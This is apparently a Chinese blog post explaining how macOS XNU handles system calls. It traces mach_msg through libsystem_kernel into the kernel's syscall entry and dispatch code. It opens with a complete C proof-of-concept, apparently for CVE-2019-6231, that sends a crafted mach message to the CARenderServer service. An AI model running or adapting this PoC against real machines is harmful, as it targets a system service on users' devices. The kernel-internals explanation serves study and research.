XNU系统调用深度解析

By xia0

XNU系统调用深度解析

从一个函数分析到系统调用的内核实现

由一段POC而起

#include <stdio.h>
#include <mach/i386/kern_return.h>
#include <mach/mach_traps.h>
#include <servers/bootstrap.h>
#include <dirent.h>
#include <sys/stat.h>
#include <time.h>
#include <dlfcn.h>
#include <unistd.h>

typedef struct quartz_register_client_s quartz_register_client_t;
struct quartz_register_client_s {

        mach_msg_header_t header;

        uint32_t body;

        mach_msg_port_descriptor_t ports[4];

        char padding[12];

};

typedef struct quartzcore_mach_msg quartzcore_mach_msg_t;

struct quartzcore_mach_msg{

        mach_msg_header_t header;

        char msg_body[712];

};

uint64_t get_filesize(const char *fn){

        struct stat st;

        stat(fn, &st);

        uint64_t fsize = st.st_size;

        return fsize;

};

int main(int argc, const char * argv[]) {



        mach_port_t p = MACH_PORT_NULL, bs_port = MACH_PORT_NULL;

        task_get_bootstrap_port(mach_task_self(), &bs_port);

        const char *render_service_name = "com.apple.CARenderServer";

        kern_return_t (*bootstrap_look_up)(mach_port_t, const char *, mach_port_t *) = dlsym(RTLD_DEFAULT, "bootstrap_look_up");

        kern_return_t kr = bootstrap_look_up(bs_port, render_service_name, &p);



        if (kr != KERN_SUCCESS) {

                return -1;

        }



        printf("[*] Get service of %s successully!\n", render_service_name);



        quartz_register_client_t msg_register;

        memset(&msg_register, 0, sizeof(msg_register));

        msg_register.header.msgh_bits =

        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) |

        MACH_MSGH_BITS_COMPLEX;

        msg_register.header.msgh_remote_port = p;

        msg_register.header.msgh_local_port = mig_get_reply_port();

        msg_register.header.msgh_id = 40202;  // _XRegisterClient



        msg_register.body = 4;

        msg_register.ports[0].name = mach_task_self();

        msg_register.ports[0].disposition = MACH_MSG_TYPE_COPY_SEND;

        msg_register.ports[0].type = MACH_MSG_PORT_DESCRIPTOR;

        msg_register.ports[1].name = mach_task_self();

        msg_register.ports[1].disposition = MACH_MSG_TYPE_COPY_SEND;

        msg_register.ports[1].type = MACH_MSG_PORT_DESCRIPTOR;

        msg_register.ports[2].name = mach_task_self();

        msg_register.ports[2].disposition = MACH_MSG_TYPE_COPY_SEND;

        msg_register.ports[2].type = MACH_MSG_PORT_DESCRIPTOR;

        msg_register.ports[3].name = mach_task_self();

        msg_register.ports[3].disposition = MACH_MSG_TYPE_COPY_SEND;

        msg_register.ports[3].type = MACH_MSG_PORT_DESCRIPTOR;



        kr = mach_msg(&msg_register.header, MACH_SEND_MSG | MACH_RCV_MSG,

                                    sizeof(quartz_register_client_t), sizeof(quartz_register_client_t),

                                    msg_register.header.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

        if (kr != KERN_SUCCESS) {

                return -1 ;

        }



        mach_port_t context_port = *(uint32_t *)((uint8_t *)&msg_register + 0x1c);

        uint32_t conn_id = *(uint32_t *)((uint8_t *)&msg_register + 0x30);



        printf("[*] context_port: 0x%x, conn_id: 0x%x\n",context_port,conn_id);



        char *crash_log = "crash.data"; //size is 736.



        FILE *fp = fopen(crash_log, "rb");

        if(fp == NULL){

                printf("fopen error!\n");

        }



        uint64_t fsize = get_filesize(crash_log);

        void *msg_buf = malloc(fsize);

        memset(msg_buf, 0, fsize);

        fread(msg_buf, fsize, 1, fp);



        quartzcore_mach_msg_t qc_mach_msg = {0};

        qc_mach_msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;

        qc_mach_msg.header.msgh_remote_port = context_port;

        qc_mach_msg.header.msgh_id = 40002;



        memset(qc_mach_msg.msg_body, 0x0, sizeof(qc_mach_msg.msg_body));

        *(uint32_t *)(qc_mach_msg.msg_body + 0) = 0x1;  // Ports count

        memcpy(qc_mach_msg.msg_body+4+12, msg_buf+0x1c+0xc, 736-0x1c-0xc);

        *(uint32_t *)(qc_mach_msg.msg_body + 4 + 12 + 4) = conn_id;



        kr = mach_msg(&qc_mach_msg.header, MACH_SEND_MSG,736, 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

        if (kr != KERN_SUCCESS) {

                printf("[-] Send message failed: 0x%d\n", kr);

                return -1 ;

        }

        return 0;

}

里面的macho函数mach_msg()到底后面执行到哪里?于是展开一段追踪

从ida的导入表中可以看到这个函数实现在libSystem.B.dylib 顺便说下,这个动态库实际上只是一层封装,里面导入了/usr/lib/system下面的动态库。

* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1
    frame #0: 0x00007fff79299694 libsystem_kernel.dylib`mach_msg
libsystem_kernel.dylib`mach_msg:
->  0x7fff79299694 <+0>: pushq  %rbp
    0x7fff79299695 <+1>: movq   %rsp, %rbp
    0x7fff79299698 <+4>: pushq  %r15
    0x7fff7929969a <+6>: pushq  %r14
Target 0: (CVE-2019-6231-poc) stopped.

调试可以看出mach_msg实现在libsystem_kernel.dylib之中

(lldb) dis
libsystem_kernel.dylib`mach_msg:
->  0x7fff79299694 <+0>:   pushq  %rbp
    0x7fff79299695 <+1>:   movq   %rsp, %rbp
    0x7fff79299698 <+4>:   pushq  %r15
    0x7fff7929969a <+6>:   pushq  %r14
    0x7fff7929969c <+8>:   pushq  %r13
    0x7fff7929969e <+10>:  pushq  %r12
    0x7fff792996a0 <+12>:  pushq  %rbx
    0x7fff792996a1 <+13>:  subq   $0x28, %rsp
    0x7fff792996a5 <+17>:  movl   %ecx, %r13d
    0x7fff792996a8 <+20>:  movl   %esi, %ebx
    0x7fff792996aa <+22>:  movq   %rdi, %r14
    0x7fff792996ad <+25>:  movl   0x10(%rbp), %eax
    0x7fff792996b0 <+28>:  movl   %ebx, %r12d
    0x7fff792996b3 <+31>:  andl   $0xfffffbbf, %r12d        ; imm = 0xFFFFFBBF 
    0x7fff792996ba <+38>:  movl   %eax, (%rsp)
    0x7fff792996bd <+41>:  movl   %r12d, %esi
    0x7fff792996c0 <+44>:  movl   %edx, %r15d
    0x7fff792996c3 <+47>:  movl   %r8d, -0x2c(%rbp)
    0x7fff792996c7 <+51>:  movl   %r9d, -0x30(%rbp)
    0x7fff792996cb <+55>:  callq  0x7fff79299170            ; mach_msg_trap
    ...
mach_msg_return_t __cdecl mach_msg(mach_msg_header_t *msg, mach_msg_option_t option, mach_msg_size_t send_size, mach_msg_size_t rcv_size, mach_port_name_t rcv_name, mach_msg_timeout_t timeout, mach_port_name_t notify)
{
  mach_msg_return_t result; // eax
  mach_msg_option_t v8; // er12

  result = mach_msg_trap();
  if ( !result )
    return 0;
  if ( !(option & 0x40) && result == 268435463 )
  {
    do
      result = mach_msg_trap();
    while ( result == 268435463 );
  }
  v8 = option;
  if ( !_bittest(&v8, 0xAu) && result == 268451845 )
  {
    do
      result = mach_msg_trap();
    while ( result == 268451845 );
  }
  return result;
}

通过调式和ida反汇编mach_msg函数可以看出,最终会调用mach_msg_trap这个函数,再跟一下

* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 3.1
    frame #0: 0x00007fff79299170 libsystem_kernel.dylib`mach_msg_trap
libsystem_kernel.dylib`mach_msg_trap:
->  0x7fff79299170 <+0>:  movq   %rcx, %r10
    0x7fff79299173 <+3>:  movl   $0x100001f, %eax          ; imm = 0x100001F 
    0x7fff79299178 <+8>:  syscall 
    0x7fff7929917a <+10>: retq   
Target 0: (CVE-2019-6231-poc) stopped.

这个函数后面会调用0x100001f系统调用,可以小结得到系统库封装了最底层的实现,最终通过系统调用进入内核。在用户层到这里已经就到头了,无法再跟进。

XNU内核系统调用流程

系统调用发生在内核之中,那么最开始处理系统调用的地方又在哪?通过intel官方文档可以找到

SYSCALL invokes an OS system-call handler at privilege level 0.
It does so by loading RIP from the IA32_LSTAR MSR

也就是内核需要将系统调用处理函数入口放到IA32_LSTAR model specific register. 在内核源码中对应在osfmk/i386/mp_desc.ccpu_syscall_init(cpu_data_t *cdp)函数之中

/*
 * Set MSRs for sysenter/sysexit and syscall/sysret for 64-bit.
 */
void
cpu_syscall_init(cpu_data_t *cdp)
{
#if MONOTONIC
    mt_cpu_up(cdp);
#else /* MONOTONIC */
#pragma unused(cdp)
#endif /* !MONOTONIC */
    wrmsr64(MSR_IA32_SYSENTER_CS, SYSENTER_CS); 
    wrmsr64(MSR_IA32_SYSENTER_EIP, DBLMAP((uintptr_t) hi64_sysenter));
    wrmsr64(MSR_IA32_SYSENTER_ESP, current_cpu_datap()->cpu_desc_index.cdi_sstku);
    /* Enable syscall/sysret */
    wrmsr64(MSR_IA32_EFER, rdmsr64(MSR_IA32_EFER) | MSR_IA32_EFER_SCE);

    /*
     * MSRs for 64-bit syscall/sysret
     * Note USER_CS because sysret uses this + 16 when returning to
     * 64-bit code.
     */
    wrmsr64(MSR_IA32_LSTAR, DBLMAP((uintptr_t) hi64_syscall));
    wrmsr64(MSR_IA32_STAR, (((uint64_t)USER_CS) << 48) | (((uint64_t)KERNEL64_CS) << 32));
    /*
     * Emulate eflags cleared by sysenter but note that
     * we also clear the trace trap to avoid the complications
     * of single-stepping into a syscall. The nested task bit
     * is also cleared to avoid a spurious "task switch"
     * should we choose to return via an IRET.
     */
    wrmsr64(MSR_IA32_FMASK, EFL_DF|EFL_IF|EFL_TF|EFL_NT);

}

wrmsr64(MSR_IA32_LSTAR, DBLMAP((uintptr_t) hi64_syscall));也就是系统调用会由hi64_syscall函数处理。这个函数实现在xnu/osfmk/x86_64/idt64.s之中

Entry(hi64_syscall)
Entry(idt64_syscall)
    swapgs
     /* Use RAX as a temporary by shifting its contents into R11[32:63]
      * The systemcall number is defined to be a 32-bit quantity, as is
      * RFLAGS.
      */
    shlq    $32, %rax
    or     %rax, %r11
.globl EXT(dblsyscall_patch_point)
EXT(dblsyscall_patch_point):
//    movabsq    $0x12345678ABCDEFFFULL, %rax
     /* Generate offset to the double-mapped per-CPU data shadow
      * into RAX
      */
    leaq    EXT(idt64_hndl_table0)(%rip), %rax
    mov    16(%rax), %rax
    mov     %rsp, %gs:CPU_UBER_TMP(%rax)  /* save user stack */
    mov     %gs:CPU_ESTACK(%rax), %rsp  /* switch stack to per-cpu estack */
    sub    $(ISF64_SIZE), %rsp

    /*
     * Synthesize an ISF frame on the exception stack
     */
    movl    $(USER_DS), ISF64_SS(%rsp)
    mov    %rcx, ISF64_RIP(%rsp)        /* rip */

    mov    %gs:CPU_UBER_TMP(%rax), %rcx
    mov    %rcx, ISF64_RSP(%rsp)        /* user stack --changed */

    mov    %r11, %rax
    shrq    $32, %rax        /* Restore RAX */
    mov    %r11d, %r11d        /* Clear r11[32:63] */

    mov    %r11, ISF64_RFLAGS(%rsp)    /* rflags */
    movl    $(SYSCALL_CS), ISF64_CS(%rsp)    /* cs - a pseudo-segment */
    mov    %rax, ISF64_ERR(%rsp)        /* err/rax - syscall code */
    movq    $(HNDL_SYSCALL), ISF64_TRAPFN(%rsp)
    movq    $(T_SYSCALL), ISF64_TRAPNO(%rsp)    /* trapno */
    swapgs
    jmp    L_dispatch            /* this can only be 64-bit */

继续跟下去,会得到如下执行流程

syscall-->hi64_syscall->L_dispatch-->ks_dispatch-->ks_dispatch_user-->L_dispatch_U64-->
L_dispatch_64bit-->L_common_dispatch-->hndl_syscall
/*
 * 64bit Tasks
 * System call entries via syscall only:
 *
 *    r15     x86_saved_state64_t
 *    rsp     kernel stack
 *
 *    both rsp and r15 are 16-byte aligned
 *    interrupts disabled
 *    direction flag cleared
 */

Entry(hndl_syscall)
    TIME_TRAP_UENTRY

    movq    %gs:CPU_ACTIVE_THREAD,%rcx    /* get current thread     */
    movl    $-1, TH_IOTIER_OVERRIDE(%rcx)    /* Reset IO tier override to -1 before handling syscall */
    movq    TH_TASK(%rcx),%rbx        /* point to current task  */

    /* Check for active vtimers in the current task */
    TASK_VTIMER_CHECK(%rbx,%rcx)

    /*
     * We can be here either for a mach, unix machdep or diag syscall,
     * as indicated by the syscall class:
     */
    movl    R64_RAX(%r15), %eax        /* syscall number/class */
    movl    %eax, %edx
    andl    $(SYSCALL_CLASS_MASK), %edx    /* syscall class */
    cmpl    $(SYSCALL_CLASS_MACH<<SYSCALL_CLASS_SHIFT), %edx
    je    EXT(hndl_mach_scall64)
    cmpl    $(SYSCALL_CLASS_UNIX<<SYSCALL_CLASS_SHIFT), %edx
    je    EXT(hndl_unix_scall64)
    cmpl    $(SYSCALL_CLASS_MDEP<<SYSCALL_CLASS_SHIFT), %edx
    je    EXT(hndl_mdep_scall64)
    cmpl    $(SYSCALL_CLASS_DIAG<<SYSCALL_CLASS_SHIFT), %edx
    je    EXT(hndl_diag_scall64)

    /* Syscall class unknown */
    sti
    CCALL3(i386_exception, $(EXC_SYSCALL), %rax, $1)
    /* no return */

hndl_syscall这个函数会系统调用分为hndl_unix_scall64hndl_mach_scall64hndl_mdep_scall64hndl_diag_scall64四类分别处理

这里以hndl_unix_scall64为列

Entry(hndl_unix_scall)

        TIME_TRAP_UENTRY

    movq    %gs:CPU_ACTIVE_THREAD,%rcx    /* get current thread     */
    movq    TH_TASK(%rcx),%rbx        /* point to current task  */
    incl    TH_SYSCALLS_UNIX(%rcx)        /* increment call count   */

    /* Check for active vtimers in the current task */
    TASK_VTIMER_CHECK(%rbx,%rcx)

    sti

    CCALL1(unix_syscall, %r15)
    /*
     * always returns through thread_exception_return
     */

这里调动了unix_syscall函数,这个函数在bsd/dev/i386/systemcalls.c之中实现,里面进行了一些权限检查

以及根据系统调用表去调用对应的实现

  thread = current_thread();
  uthread = get_bsdthread_info(thread);
  // regs is derrived from r15 ...
  code = regs->rax & SYSCALL_NUMBER_MASK;
  callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
  // ...
  vt = (void *)uthread->uu_arg;
  // ...
  memcpy(vt, args_start_at_rdi ? &regs->rdi : &regs->rsi,
        args_in_regs * sizeof(syscall_arg_t));
  // ...
  error = (*(callp->sy_call))((void *)p, vt, &(uthread->uu_rval[0]));

目前执行的流程如下

hi64_syscall
L_dispatch_U64
L_dispatch_64bit
L_common_dispatch
hndl_syscall // rdx, pushed in hi64_syscall
hndl_unix_scall64
unix_syscall64
error = (*(callp->sy_call))((void *)p, vt, &(uthread->uu_rval[0])); // now we're there

参考

https://www.binss.me/blog/interrupt-and-exception/

https://0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-2.html

https://gist.github.com/yrp604/23e86dce9ca12bf514ef